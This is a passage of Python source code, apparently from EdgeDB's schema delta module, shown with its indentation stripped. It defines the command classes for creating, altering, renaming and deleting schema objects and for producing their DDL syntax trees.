qlclass = self.get_schema_metaclass().get_ql_class()
if isinstance(name, sn.QualName):
nname = sn.shortname_from_fullname(name)
assert isinstance(nname, sn.QualName), \
"expected qualified name"
ref = qlast.ObjectRef(
module=nname.module, name=nname.name, itemclass=qlclass)
else:
ref = qlast.ObjectRef(module='', name=str(name), itemclass=qlclass)
return ref
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
astnode = self._get_ast_node(schema, context)
if astnode.get_field('name'):
name = context.early_renames.get(self.classname, self.classname)
op = astnode( # type: ignore
name=self._deparse_name(schema, context, name),
)
else:
op = astnode()
self._apply_fields_ast(schema, context, op)
return op
def _apply_fields_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
node: qlast.DDLOperation,
) -> None:
mcls = self.get_schema_metaclass()
if not isinstance(self, DeleteObject):
fops = self.get_subcommands(type=AlterObjectProperty)
for fop in sorted(fops, key=lambda f: f.property):
field = mcls.get_field(fop.property)
if fop.new_value is not None:
new_value = fop.new_value
else:
new_value = field.get_default()
if (
(
# Only include fields that are not inherited
# and that have their value actually changed.
not fop.new_inherited
or context.descriptive_mode
or self.ast_ignore_ownership()
)
and (
fop.old_value != new_value
or fop.old_inherited != fop.new_inherited
or fop.old_computed != fop.new_computed
)
):
self._apply_field_ast(schema, context, node, fop)
if not isinstance(self, AlterObjectFragment):
for field in self.get_ddl_identity_fields(context):
ast_attr = self.get_ast_attr_for_field(field.name, type(node))
if (
ast_attr is not None
and not getattr(node, ast_attr, None)
and (
field.required
or self.has_ddl_identity(field.name)
)
):
ddl_id = self.get_ddl_identity(field.name)
if issubclass(field.type, s_expr.Expression):
attr_val = ddl_id.qlast
elif issubclass(field.type, s_expr.ExpressionList):
attr_val = [e.qlast for e in ddl_id]
else:
raise AssertionError(
f'unexpected type of ddl_identity'
f' field: {field.type!r}'
)
setattr(node, ast_attr, attr_val)
# Keep subcommands from refdicts and alter fragments (like
# rename, rebase) in order when producing DDL asts
refdicts = tuple(x.ref_cls for x in mcls.get_refdicts())
for op in self.get_subcommands():
if (
isinstance(op, AlterObjectFragment)
or (isinstance(op, ObjectCommand) and
issubclass(op.get_schema_metaclass(), refdicts))
):
self._append_subcmd_ast(schema, node, op, context)
else:
for op in self.get_subcommands(type=AlterObjectFragment):
self._append_subcmd_ast(schema, node, op, context)
if isinstance(node, qlast.DropObject):
# Deletes in the AST shouldn't have subcommands, so we
# drop them. To try to make sure we aren't papering
# over bugs by dropping things we dont expect, make
# sure every subcommand was also a delete.
assert all(
isinstance(sub, qlast.DropObject) for sub in node.commands)
node.commands = []
def _apply_field_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
node: qlast.DDLOperation,
op: AlterObjectProperty,
) -> None:
if op.property != 'name':
subnode = op._get_ast(schema, context, parent_node=node)
if subnode is not None:
node.commands.append(subnode)
def get_ast_attr_for_field(
self,
field: str,
astnode: Type[qlast.DDLOperation],
) -> Optional[str]:
return None
def get_ddl_identity_fields(
self,
context: CommandContext,
) -> Tuple[so.Field[Any], ...]:
mcls = self.get_schema_metaclass()
return tuple(f for f in mcls.get_fields().values() if f.ddl_identity)
@classmethod
def maybe_get_schema_metaclass(cls) -> Optional[Type[so.Object_T]]:
return cls._schema_metaclass
@classmethod
def get_schema_metaclass(cls) -> Type[so.Object_T]:
if cls._schema_metaclass is None:
raise TypeError(f'schema metaclass not set for {cls}')
return cls._schema_metaclass
@classmethod
def get_other_command_class(
cls,
cmdtype: Type[ObjectCommand_T],
) -> Type[ObjectCommand_T]:
mcls = cls.get_schema_metaclass()
return get_object_command_class_or_die(cmdtype, mcls)
def _validate_legal_command(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
from . import functions as s_func
if (not context.stdmode and not context.testmode and
not isinstance(self, s_func.ParameterCommand)):
if (
isinstance(self.classname, sn.QualName)
and (
(modname := self.classname.get_module_name())
in s_schema.STD_MODULES
)
):
raise errors.SchemaDefinitionError(
f'cannot {self._delta_action} {self.get_verbosename()}: '
f'module {modname} is read-only',
context=self.source_context)
def get_verbosename(self, parent: Optional[str] = None) -> str:
mcls = self.get_schema_metaclass()
return mcls.get_verbosename_static(self.classname, parent=parent)
def get_displayname(self) -> str:
mcls = self.get_schema_metaclass()
return mcls.get_displayname_static(self.classname)
def get_friendly_object_name_for_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Optional[so.Object_T] = None,
object_desc: Optional[str] = None,
) -> str:
if object_desc is not None:
return object_desc
else:
if object is None:
object = getattr(self, 'scls', _dummy_object)
if object is _dummy_object or schema is None:
if not isinstance(parent_op, ObjectCommand):
parent_desc = None
else:
parent_desc = parent_op.get_verbosename()
object_desc = self.get_verbosename(parent=parent_desc)
else:
object_desc = object.get_verbosename(schema, with_parent=True)
return object_desc
@overload
def get_object(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
) -> so.Object_T:
...
@overload
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: None = None,
) -> Optional[so.Object_T]:
...
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
) -> Optional[so.Object_T]:
metaclass = self.get_schema_metaclass()
if name is None:
name = self.classname
rename = context.renames.get(name)
if rename is not None:
name = rename
return schema.get_global(metaclass, name, default=default)
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
"""Resolve, canonicalize and amend field mutations in this command.
This is called just before the object described by this command
is created or updated but after all prerequisite command have
been applied, so it is safe to resolve object shells and do
other schema inquiries here.
"""
return schema
def populate_ddl_identity(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
return schema
def get_resolved_attribute_value(
self,
attr_name: str,
*,
schema: s_schema.Schema,
context: CommandContext,
) -> Any:
raw_value = self.get_attribute_value(attr_name)
if raw_value is None:
return None
value = context.get_cached((self, 'attribute', attr_name))
if value is None:
value = self.resolve_attribute_value(
attr_name,
raw_value,
schema=schema,
context=context,
)
context.cache_value((self, 'attribute', attr_name), value)
return value
def resolve_attribute_value(
self,
attr_name: str,
raw_value: Any,
*,
schema: s_schema.Schema,
context: CommandContext,
) -> Any:
metaclass = self.get_schema_metaclass()
field = metaclass.get_field(attr_name)
if field is None:
raise errors.SchemaDefinitionError(
f'got AlterObjectProperty command for '
f'invalid field: {metaclass.__name__}.{attr_name}')
value = self._resolve_attr_value(
raw_value, attr_name, field, schema)
if (isinstance(value, s_expr.Expression)
and not value.is_compiled()):
value = self.compile_expr_field(schema, context, field, value)
return value
def get_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_attribute_value(attr)
return result
def get_resolved_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_resolved_attribute_value(
attr, schema=schema, context=context)
return result
def get_orig_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> Dict[str, Any]:
result = {}
for attr in self.enumerate_attributes():
result[attr] = self.get_orig_attribute_value(attr)
return result
def get_specified_attribute_value(
self,
field: str,
schema: s_schema.Schema,
context: CommandContext,
) -> Optional[Any]:
"""Fetch the specified (not computed) value of a field.
If the command is an alter, it will fall back to the value in
the schema.
Return None if there is no specified value or if the specified
value is being reset.
"""
spec = self.get_attribute_value(field)
is_alter = (
isinstance(self, AlterObject)
or (
isinstance(self, AlterObjectFragment)
and isinstance(self.get_parent_op(context), AlterObject)
)
)
if (
is_alter
and spec is None
and not self.has_attribute_value(field)
and field not in self.scls.get_computed_fields(schema)
):
spec = self.scls.get_explicit_field_value(
schema, field, default=None)
return spec
def compile_expr_field(
self,
schema: s_schema.Schema,
context: CommandContext,
field: so.Field[Any],
value: Any,
track_schema_ref_exprs: bool=False,
) -> s_expr.Expression:
cdn = self.get_schema_metaclass().get_schema_class_displayname()
raise errors.InternalServerError(
f'uncompiled expression in the field {field.name!r} of '
f'{cdn} {self.classname!r}'
)
def get_dummy_expr_field_value(
self,
schema: s_schema.Schema,
context: CommandContext,
field: so.Field[Any],
value: Any,
) -> Optional[s_expr.Expression]:
"""Return a dummy value for an expression stored in *field*.
Schema class command implementations should overload this
to specify a dummy value for an expression field, which is necessary
when doing dependency type and name propagation switcheroo in
_propagate_if_expr_refs() / _finalize_affected_refs().
"""
raise NotImplementedError
def _create_begin(
self, schema: s_schema.Schema, context: CommandContext
) -> s_schema.Schema:
raise NotImplementedError
def new_context(
self: ObjectCommand[so.Object_T],
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> CommandContextWrapper[ObjectCommand[so.Object_T]]:
ctxcls = type(self).get_context_class()
assert ctxcls is not None
return context(
ctxcls(schema=schema, op=self, scls=scls), # type: ignore
)
def get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
dummy = cast(so.Object_T, _dummy_object)
context_class = type(self).get_context_class()
if context_class is not None:
with self.new_context(schema, context, dummy):
return self._get_ast(schema, context, parent_node=parent_node)
else:
return self._get_ast(schema, context, parent_node=parent_node)
def get_ddl_identity(self, aspect: str) -> Any:
if self.ddl_identity is None:
raise LookupError(f'{self!r} has no DDL identity information')
value = self.ddl_identity.get(aspect)
if value is None:
raise LookupError(f'{self!r} has no {aspect!r} in DDL identity')
return value
def has_ddl_identity(self, aspect: str) -> bool:
return (
self.ddl_identity is not None
and self.ddl_identity.get(aspect) is not None
)
def set_ddl_identity(self, aspect: str, value: Any) -> None:
if self.ddl_identity is None:
self.ddl_identity = {}
self.ddl_identity[aspect] = value
def maybe_get_object_aux_data(self, field: str) -> Any:
if self.aux_object_data is None:
return None
else:
value = self.aux_object_data.get(field)
if value is None:
return None
else:
return value
def get_object_aux_data(self, field: str) -> Any:
if self.aux_object_data is None:
raise LookupError(f'{self!r} has no auxiliary object information')
value = self.aux_object_data.get(field)
if value is None:
raise LookupError(
f'{self!r} has no {field!r} in auxiliary object information')
return value
def has_object_aux_data(self, field: str) -> bool:
return (
self.aux_object_data is not None
and self.aux_object_data.get(field) is not None
)
def set_object_aux_data(self, field: str, value: Any) -> None:
if self.aux_object_data is None:
self.aux_object_data = {}
self.aux_object_data[field] = value
def get_annotation(self, name: str) -> Any:
if self.annotations is None:
return None
else:
return self.annotations.get(name)
def set_annotation(self, name: str, value: Any) -> None:
if self.annotations is None:
self.annotations = {}
self.annotations[name] = value
def ast_ignore_ownership(self) -> bool:
"""Whether to force generating an AST even though it isn't owned"""
return False
class ObjectCommandContext(CommandContextToken[ObjectCommand[so.Object_T]]):
def __init__(
self,
schema: s_schema.Schema,
op: ObjectCommand[so.Object_T],
scls: so.Object_T,
*,
modaliases: Optional[Mapping[Optional[str], str]] = None,
localnames: AbstractSet[str] = frozenset(),
) -> None:
super().__init__(
schema, op, modaliases=modaliases, localnames=localnames)
self.scls = scls
class QualifiedObjectCommand(ObjectCommand[so.QualifiedObject_T]):
classname = struct.Field(sn.QualName)
@classmethod
def _classname_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: CommandContext,
) -> sn.QualName:
objref = astnode.name
module = context.modaliases.get(objref.module, objref.module)
if module is None:
raise errors.SchemaDefinitionError(
f'unqualified name and no default module set',
context=objref.context,
)
return sn.QualName(module=module, name=objref.name)
@overload
def get_object(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[so.QualifiedObject_T, so.NoDefaultT] = so.NoDefault,
) -> so.QualifiedObject_T:
...
@overload
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: None = None,
) -> Optional[so.QualifiedObject_T]:
...
def get_object( # NoQA: F811
self,
schema: s_schema.Schema,
context: CommandContext,
*,
name: Optional[sn.Name] = None,
default: Union[
so.QualifiedObject_T, so.NoDefaultT, None] = so.NoDefault,
) -> Optional[so.QualifiedObject_T]:
if name is None:
name = self.classname
rename = context.renames.get(name)
if rename is not None:
name = rename
metaclass = self.get_schema_metaclass()
return cast(
Optional[so.QualifiedObject_T],
schema.get(name, type=metaclass, default=default,
sourcectx=self.source_context),
)
class GlobalObjectCommand(ObjectCommand[so.GlobalObject_T]):
pass
class ExternalObjectCommand(ObjectCommand[so.ExternalObject_T]):
pass
class CreateObject(ObjectCommand[so.Object_T], Generic[so.Object_T]):
_delta_action = 'create'
# If the command is conditioned with IF NOT EXISTS
if_not_exists = struct.Field(bool, default=False)
def is_data_safe(self) -> bool:
# Creations are always data-safe.
return True
@classmethod
def command_for_ast_node(
cls,
astnode: qlast.DDLOperation,
schema: s_schema.Schema,
context: CommandContext,
) -> Type[ObjectCommand[so.Object_T]]:
assert isinstance(astnode, qlast.CreateObject), "expected CreateObject"
if astnode.sdl_alter_if_exists:
modaliases = cls._modaliases_from_ast(schema, astnode, context)
dummy_op = cls(
classname=sn.QualName('placeholder', 'placeholder'))
ctxcls = cast(
Type[ObjectCommandContext[so.Object_T]],
cls.get_context_class_or_die(),
)
ctx = ctxcls(
schema,
op=dummy_op,
scls=cast(so.Object_T, _dummy_object),
modaliases=modaliases,
)
with context(ctx):
classname = cls._classname_from_ast(schema, astnode, context)
mcls = cls.get_schema_metaclass()
if schema.get(classname, default=None) is not None:
return get_object_command_class_or_die(
AlterObject, mcls)
return cls
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(astnode, qlast.CreateObject)
assert isinstance(cmd, CreateObject)
cmd.if_not_exists = astnode.create_if_not_exists
cmd.set_attribute_value('name', cmd.classname)
if getattr(astnode, 'abstract', False):
cmd.set_attribute_value('abstract', True)
return cmd
def get_verb(self) -> str:
return 'create'
def validate_create(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
pass
def _create_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self._validate_legal_command(schema, context)
for op in self.get_prerequisites():
schema = op.apply(schema, context)
if context.schema_object_ids is not None:
mcls = self.get_schema_metaclass()
qlclass: Optional[qltypes.SchemaObjectClass]
if issubclass(mcls, so.QualifiedObject):
qlclass = None
else:
qlclass = mcls.get_ql_class_or_die()
objname = self.classname
if context.compat_ver_is_before(
(1, 0, verutils.VersionStage.ALPHA, 5)
):
# Pre alpha.5 used to have a different name mangling scheme.
objname = sn.compat_name_remangle(str(objname))
key = (objname, qlclass)
specified_id = context.schema_object_ids.get(key)
if specified_id is not None:
self.set_attribute_value('id', specified_id)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
self.validate_create(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
computed_fields = {n for n, v in computed_status.items() if v}
if computed_fields:
self.set_attribute_value(
'computed_fields', frozenset(computed_fields))
props = self.get_resolved_attributes(schema, context)
metaclass = self.get_schema_metaclass()
# Check if functions by this name exist
fn = props.get('name')
if fn is not None and not sn.is_fullname(str(fn)):
funcs = schema.get_functions(fn, tuple())
if funcs:
raise errors.SchemaError(
f'{funcs[0].get_verbosename(schema)} is already present '
f'in the schema {schema!r}')
schema, self.scls = metaclass.create_in_schema(schema, **props)
if not props.get('id'):
# Record the generated ID.
self.set_attribute_value('id', self.scls.id)
return schema
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().canonicalize_attributes(schema, context)
self.set_attribute_value('builtin', context.stdmode)
if not self.has_attribute_value('builtin'):
self.set_attribute_value('builtin', context.stdmode)
if not self.has_attribute_value('internal'):
self.set_attribute_value('internal', context.internal_schema_mode)
return schema
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
if node is not None and self.if_not_exists:
assert isinstance(node, qlast.CreateObject)
node.create_if_not_exists = True
return node
def _create_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(include_prerequisites=False):
if not isinstance(op, AlterObjectProperty):
schema = op.apply(schema, context=context)
return schema
def _create_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical:
self.validate_object(schema, context)
return schema
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
with self.new_context(schema, context, _dummy_object): # type: ignore
if self.if_not_exists:
scls = self.get_object(schema, context, default=None)
if scls is not None:
parent_ctx = context.parent()
if parent_ctx is not None and not self.canonical:
parent_ctx.op.discard(self)
self.scls = scls
return schema
schema = self._create_begin(schema, context)
ctx = context.current()
objctx = cast(ObjectCommandContext[so.Object_T], ctx)
objctx.scls = self.scls
schema = self._create_innards(schema, context)
schema = self._create_finalize(schema, context)
return schema
class CreateExternalObject(
CreateObject[so.ExternalObject_T],
ExternalObjectCommand[so.ExternalObject_T],
):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
with self.new_context(schema, context, _dummy_object): # type: ignore
if self.if_not_exists:
raise NotImplementedError(
'if_not_exists not implemented for external objects')
schema = self._create_begin(schema, context)
schema = self._create_innards(schema, context)
schema = self._create_finalize(schema, context)
return schema
def _create_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
self._validate_legal_command(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
self.validate_create(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
computed_fields = {n for n, v in computed_status.items() if v}
if computed_fields:
self.set_attribute_value(
'computed_fields', frozenset(computed_fields))
props = self.get_resolved_attributes(schema, context)
metaclass = self.get_schema_metaclass()
obj_id = props.get('id')
if obj_id is None:
obj_id = metaclass._prepare_id(schema, props)
self.set_attribute_value('id', obj_id)
self.scls = metaclass._create_from_id(obj_id)
return schema
class AlterObjectOrFragment(ObjectCommand[so.Object_T]):
def canonicalize_attributes(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = super().canonicalize_attributes(schema, context)
# Hydrate the ALTER fields with original field values,
# if not present.
for cmd in self.get_subcommands(type=AlterObjectProperty):
if cmd.old_value is None:
cmd.old_value = self.scls.get_explicit_field_value(
schema, cmd.property, default=None)
return schema
def validate_alter(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
self._validate_legal_command(schema, context)
def _alter_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_prerequisites():
schema = op.apply(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
computed_status = self._get_computed_status_of_fields(
schema, context)
self._update_computed_fields(schema, context, computed_status)
self.validate_alter(schema, context)
props = self.get_resolved_attributes(schema, context)
return self.scls.update(schema, props)
def _alter_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(include_prerequisites=False):
if not isinstance(op, AlterObjectProperty):
schema = op.apply(schema, context=context)
return schema
def _alter_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
schema = self._finalize_affected_refs(schema, context)
if not context.canonical:
self.validate_object(schema, context)
return schema
class AlterObjectFragment(AlterObjectOrFragment[so.Object_T]):
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
# AlterObjectFragment must be executed in the context
# of a parent AlterObject command.
scls = self.get_parent_op(context).scls
self.scls = cast(so.Object_T, scls)
schema = self._alter_begin(schema, context)
schema = self._alter_innards(schema, context)
schema = self._alter_finalize(schema, context)
return schema
@classmethod
def get_parent_op(
cls,
context: CommandContext,
) -> ObjectCommand[so.Object]:
op = context.current().op
assert isinstance(op, ObjectCommand)
return op
class RenameObject(AlterObjectFragment[so.Object_T]):
_delta_action = 'rename'
astnode = qlast.Rename
new_name = struct.Field(sn.Name)
def is_data_safe(self) -> bool:
# Renames are always data-safe.
return True
def get_verb(self) -> str:
return 'rename'
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
object_desc = self.get_friendly_object_name_for_description(
parent_op=parent_op,
schema=schema,
object=object,
object_desc=object_desc,
)
mcls = self.get_schema_metaclass()
new_name = mcls.get_displayname_static(self.new_name)
return f"rename {object_desc} to '{new_name}'"
def _fix_referencing_expr(
self,
schema: s_schema.Schema,
cmd: ObjectCommand[so.Object],
fn: str,
context: CommandContext,
expr: s_expr.Expression,
) -> s_expr.Expression:
from edb.ir import ast as irast
# Recompile the expression with reference tracking on so that we
# can clean up the ast.
field = cmd.get_schema_metaclass().get_field(fn)
compiled = cmd.compile_expr_field(
schema, context, field, expr,
track_schema_ref_exprs=True)
assert isinstance(compiled.irast, irast.Statement)
assert compiled.irast.schema_ref_exprs is not None
# Now that the compilation is done, try to do the fixup.
new_shortname = sn.shortname_from_fullname(self.new_name)
old_shortname = sn.shortname_from_fullname(self.classname).name
for ref in compiled.irast.schema_ref_exprs.get(self.scls, []):
if isinstance(ref, qlast.Ptr):
ref = ref.ptr
assert isinstance(ref, (qlast.ObjectRef, qlast.FunctionCall)), (
f"only support object refs and func calls but got {ref}")
if isinstance(ref, qlast.FunctionCall):
ref.func = ((new_shortname.module, new_shortname.name)
if isinstance(new_shortname, sn.QualName)
else new_shortname.name)
elif (
isinstance(ref, qlast.ObjectRef)
and ref.name == old_shortname
):
ref.name = new_shortname.name
if (
isinstance(new_shortname, sn.QualName)
and new_shortname.module != "__"
):
ref.module = new_shortname.module
# say as_fragment=True as a hack to avoid renormalizing it
out = s_expr.Expression.from_ast(
compiled.qlast, schema, modaliases={}, as_fragment=True)
return out
def _alter_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
scls = self.scls
context.renames[self.classname] = self.new_name
context.renamed_objs.add(scls)
vn = scls.get_verbosename(schema)
schema = self._propagate_if_expr_refs(
schema,
context,
action=f'rename {vn}',
fixer=self._fix_referencing_expr,
)
if not context.canonical:
self.set_attribute_value(
'name',
value=self.new_name,
orig_value=self.classname,
)
return super()._alter_begin(schema, context)
def _alter_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical:
self._canonicalize(schema, context, self.scls)
return super()._alter_innards(schema, context)
def init_rename_branch(
self,
ref: so.Object,
new_ref_name: sn.Name,
schema: s_schema.Schema,
context: CommandContext,
) -> Command:
ref_root, ref_alter, _ = ref.init_delta_branch(
schema, context, AlterObject)
ref_alter.add(
ref.init_delta_command(
schema,
RenameObject,
new_name=new_ref_name,
),
)
return ref_root
def _canonicalize(
self,
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> None:
mcls = self.get_schema_metaclass()
for refdict in mcls.get_refdicts():
all_refs = set(
scls.get_field_value(schema, refdict.attr).objects(schema)
)
ref: so.Object
for ref in all_refs:
ref_name = ref.get_name(schema)
quals = list(sn.quals_from_fullname(ref_name))
assert isinstance(self.new_name, sn.QualName)
quals[0] = str(self.new_name)
shortname = sn.shortname_from_fullname(ref_name)
new_ref_name = sn.QualName(
name=sn.get_specialized_name(shortname, *quals),
module=self.new_name.module,
)
self.add(self.init_rename_branch(
ref,
new_ref_name,
schema=schema,
context=context,
))
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
astnode = self._get_ast_node(schema, context)
ref = self._deparse_name(schema, context, self.new_name)
ref.itemclass = None
orig_ref = self._deparse_name(schema, context, self.classname)
# Ha, ha! Do it recursively to force any renames in children!
self._log_all_renames(context)
if (orig_ref.module, orig_ref.name) != (ref.module, ref.name):
return astnode(new_name=ref) # type: ignore
else:
return None
@classmethod
def _cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> RenameObject[so.Object_T]:
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_class = parent_op.get_schema_metaclass()
rename_class = get_object_command_class_or_die(
RenameObject, parent_class)
return rename_class._rename_cmd_from_ast(schema, astnode, context)
@classmethod
def _rename_cmd_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> RenameObject[so.Object_T]:
assert isinstance(astnode, qlast.Rename)
parent_ctx = context.current()
parent_op = parent_ctx.op
assert isinstance(parent_op, ObjectCommand)
parent_class = parent_op.get_schema_metaclass()
rename_class = get_object_command_class_or_die(
RenameObject, parent_class)
new_name = cls._classname_from_ast(schema, astnode, context)
# Populate the early_renames map of the context as we go, since
# in-flight renames will affect the generated names of later
# operations.
context.early_renames[parent_op.classname] = new_name
return rename_class(
classname=parent_op.classname,
new_name=new_name,
)
class AlterObject(AlterObjectOrFragment[so.Object_T], Generic[so.Object_T]):
_delta_action = 'alter'
#: If True, apply the command only if the object exists.
if_exists = struct.Field(bool, default=False)
#: If True, only apply changes to properties, not "real" schema changes
metadata_only = struct.Field(bool, default=False)
def get_verb(self) -> str:
return 'alter'
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: CommandContext,
) -> Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
assert isinstance(cmd, AlterObject)
if getattr(astnode, 'abstract', False):
cmd.set_attribute_value('abstract', True)
return cmd
def _get_ast(
self,
schema: s_schema.Schema,
context: CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
node = super()._get_ast(schema, context, parent_node=parent_node)
if (node is not None and hasattr(node, 'commands') and
not node.commands):
# Alter node without subcommands. Occurs when all
# subcommands have been filtered out of DDL stream,
# so filter it out as well.
node = None
return node
def canonicalize_alter_from_external_ref(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> None:
"""Canonicalize an ALTER command triggered by a modification of a
an object referred to by an expression in this object."""
pass
def apply(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.if_exists:
scls = self.get_object(schema, context, default=None)
if scls is None:
context.current().op.discard(self)
return schema
else:
scls = self.get_object(schema, context)
self.scls = scls
with self.new_context(schema, context, scls):
schema = self._alter_begin(schema, context)
schema = self._alter_innards(schema, context)
schema = self._alter_finalize(schema, context)
return schema
class DeleteObject(ObjectCommand[so.Object_T], Generic[so.Object_T]):
_delta_action = 'delete'
#: If True, apply the command only if the object exists.
if_exists = struct.Field(bool, default=False)
#: If True, apply the command only if the object has no referrers
#: in the schema.
if_unused = struct.Field(bool, default=False)
def get_verb(self) -> str:
return 'drop'
def is_data_safe(self) -> bool:
# Deletions are only safe if the entire object class
# has been declared as data-safe.
return self.get_schema_metaclass()._data_safe
def _delete_begin(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
from . import ordering
self._validate_legal_command(schema, context)
if not context.canonical:
schema = self.populate_ddl_identity(schema, context)
schema = self.canonicalize_attributes(schema, context)
if not context.get_value(('delcanon', self)):
commands = self._canonicalize(schema, context, self.scls)
root = DeltaRoot()
root.update(commands)
root = ordering.linearize_delta(root, schema, schema)
self.update(root.get_subcommands())
return schema
def _canonicalize(
self,
schema: s_schema.Schema,
context: CommandContext,
scls: so.Object_T,
) -> List[Command]:
mcls = self.get_schema_metaclass()
commands: List[Command] = []
for refdict in mcls.get_refdicts():
deleted_refs = set()
all_refs = set(
scls.get_field_value(schema, refdict.attr).objects(schema)
)
refcmds = cast(
Tuple[ObjectCommand[so.Object], ...],
self.get_subcommands(metaclass=refdict.ref_cls),
)
for op in refcmds:
deleted_ref: so.Object = schema.get(op.classname)
deleted_refs.add(deleted_ref)
# Add implicit Delete commands for any local refs not
# deleted explicitly.
for ref in all_refs - deleted_refs:
op = ref.init_delta_command(schema, DeleteObject)
assert isinstance(op, DeleteObject)
subcmds = op._canonicalize(schema, context, ref)
op.update(subcmds)
commands.append(op)
# Record the fact that DeleteObject._canonicalize
# was called on this object to guard against possible
# duplicate calls.
context.store_value(('delcanon', self), True)
return commands
def _delete_innards(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
for op in self.get_subcommands(metaclass=so.Object):
schema = op.apply(schema, context=context)
return schema
def _delete_finalize(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> s_schema.Schema:
ref_strs = []
if not context.canonical and not context.disable_dep_verification:
refs = schema.get_referrers(self.scls)
ctx = context.current()
assert ctx is not None
orig_schema = ctx.original_schema
if refs:
for ref in refs:
if (not context.is_deleting(ref)
and ref.is_blocking_ref(orig_schema, self.scls)):
ref_strs.append(
ref.get_verbosename(orig_schema, with_parent=True))
if ref_strs:
vn = self.scls.get_verbosename(orig_schema, with_parent=True)
dn = self.scls.get_displayname(orig_schema)
detail = '; '.join(f'{ref_str} depends on {dn}'
for ref_str in ref_strs)
raise errors.SchemaError(
f'cannot drop {vn} because '
f'other objects in the schema depend on it',
details=detail,
)
schema = schema.delete(self.scls)
return schema
def _has_outside_references(
self,
schema: s_schema.Schema,
context: CommandContext,
) -> bool:
